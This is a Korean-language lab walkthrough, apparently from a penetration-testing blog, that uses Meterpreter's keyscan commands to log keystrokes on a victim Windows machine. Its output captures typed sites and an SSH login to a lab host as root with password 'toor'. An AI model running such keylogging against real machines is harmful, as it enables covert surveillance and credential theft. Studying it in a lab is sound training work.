실습> 키로그
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
1. 키로그 시작
meterpreter > keyscan_start
Starting the keystroke sniffer ...
2. Victim에서 입력
notepad를 실행해서 아래 내용을 입력한다.
hello
hi
브라우저를 열어서 google.co.kr, naver.com을 입력한다.
3. 키로그 확인
meterpreter > keyscan_dump
Dumping captured keystrokes...
hello<CR>
hi
meterpreter > keyscan_dump
Dumping captured keystrokes...
ooge<^H>e<^H>le.co.kr<CR>
<Left Windows>cmd<CR>
ping 8.8.8.8<CR>
<^C>ipconfig/all<CR>
2<CR>
naver.com<CR>
goo<Down><CR>
<F5>daum.net<CR>
putty.exe를 Victim에 업로드한다.
putty.exe를 실행해서 서버에 로그인한다.
host : 192.168.108.102
user : root
pass : toor
keyscan_dump 키보드 스캔을 받은 내용을 화면에 덤프한다.
meterpreter > keyscan_dump
Dumping captured keystrokes...
<Shift><Shift><Shift><Delete><CR>
<Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Delete><CR>
192.168.108.102<CR> <-- host
<Left><Left>root<CR> <-- user
toor<CR> <-- pass
키보드 스캔을 종료한다.
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
'Linux > 모의해킹' 카테고리의 다른 글
| Windows 레지스트리 악성코드 등록 실습 (0) | 2022.01.05 |
|---|---|
| 레지스트리 명령어 추가 (0) | 2022.01.05 |
| 파일 다운로드 (0) | 2022.01.05 |
| meterpreter 명령어 사용하기 (0) | 2022.01.05 |
| 쉘스크립트를 활용한 공격 1 & 2 (0) | 2022.01.04 |